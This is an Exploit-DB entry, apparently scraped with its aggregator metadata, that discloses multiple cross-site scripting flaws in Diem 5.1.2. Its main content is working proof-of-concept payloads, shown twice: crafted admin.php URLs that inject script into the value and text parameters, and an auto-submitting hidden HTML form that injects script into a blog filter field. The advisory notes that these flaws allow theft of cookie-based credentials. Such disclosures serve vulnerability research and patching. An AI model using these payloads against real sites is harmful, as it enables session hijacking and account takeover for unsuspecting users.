Diem 5.1.2 - Multiple Cross-Site Scripting Vulnerabilities
2010-07-13T00:00:00
ID EDB-ID:34302 Type exploitdb Reporter High-Tech Bridge SA Modified 2010-07-13T00:00:00
Description
Diem 5.1.2 Multiple Cross Site Scripting Vulnerabilities. Webapps exploit for php platform
source: http://www.securityfocus.com/bid/41587/info
Diem is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Diem 5.1.2 is vulnerable; other versions may also be affected.
http://www.example.com/admin.php/seo/pages/manage-pages/editField?dm_cpi=0&dm_xhr=1&value=title"><script>alert(document.cookie)<%2Fscript>&id=&page_id=1&field=title
http://www.example.com/admin.php/+/dmCore/markdown?dm_cpi=0&dm_xhr=1&text=title"><script>alert(document.cookie)<%2Fscript>
<form action="http://www.example.com/admin.php/content/blog/articles/filter" name="main" >
<input type="hidden" name="article_form_filter[name][text]" value='1"><script>alert(document.cookie)</script>' />
<input type="hidden" name="article_form_filter[is_active]" value="" />
<input type="hidden" name="article_form_filter[text][text]" value="" />
<input type="hidden" name="article_form_filter[created_by]" value="" />
<input type="hidden" name="article_form_filter[created_at]" value="" />
<input type="hidden" name="article_form_filter[updated_at]" value="" />
</form>
<script>
document.main.submit();
</script>
{"id": "EDB-ID:34302", "hash": "aab12da0086c5cd849aef9c54a879db4", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Diem 5.1.2 - Multiple Cross-Site Scripting Vulnerabilities", "description": "Diem 5.1.2 Multiple Cross Site Scripting Vulnerabilities. Webapps exploit for php platform", "published": "2010-07-13T00:00:00", "modified": "2010-07-13T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/34302/", "reporter": "High-Tech Bridge SA", "references": [], "cvelist": [], "lastseen": "2016-02-03T20:54:39", "history": [], "viewCount": 0, "enchantments": {"score": {"value": -0.2, "vector": "NONE", "modified": "2016-02-03T20:54:39"}, "dependencies": {"references": [], "modified": "2016-02-03T20:54:39"}, "vulnersScore": -0.2}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/34302/", "sourceData": "source: http://www.securityfocus.com/bid/41587/info\r\n\r\nDiem is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.\r\n\r\nAn attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.\r\n\r\nDiem 5.1.2 is vulnerable; other versions may also be affected.\r\n\r\nhttp://www.example.com/admin.php/seo/pages/manage-pages/editField?dm_cpi=0&dm_xhr=1&value=title\"><script>alert(document.cookie)<%2Fscript>&id=&page_id=1&field=title\r\nhttp://www.example.com/admin.php/+/dmCore/markdown?dm_cpi=0&dm_xhr=1&text=title\"><script>alert(document.cookie)<%2Fscript>\r\n\r\n<form action=\"http://www.example.com/admin.php/content/blog/articles/filter\" name=\"main\" >\r\n<input type=\"hidden\" name=\"article_form_filter[name][text]\" value='1\"><script>alert(document.cookie)</script>' />\r\n<input type=\"hidden\" name=\"article_form_filter[is_active]\" value=\"\" />\r\n<input type=\"hidden\" name=\"article_form_filter[text][text]\" value=\"\" />\r\n<input type=\"hidden\" name=\"article_form_filter[created_by]\" value=\"\" />\r\n<input type=\"hidden\" name=\"article_form_filter[created_at]\" value=\"\" />\r\n<input type=\"hidden\" name=\"article_form_filter[updated_at]\" value=\"\" />\r\n</form>\r\n<script>\r\ndocument.main.submit();\r\n</script>\r\n", "osvdbidlist": [], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}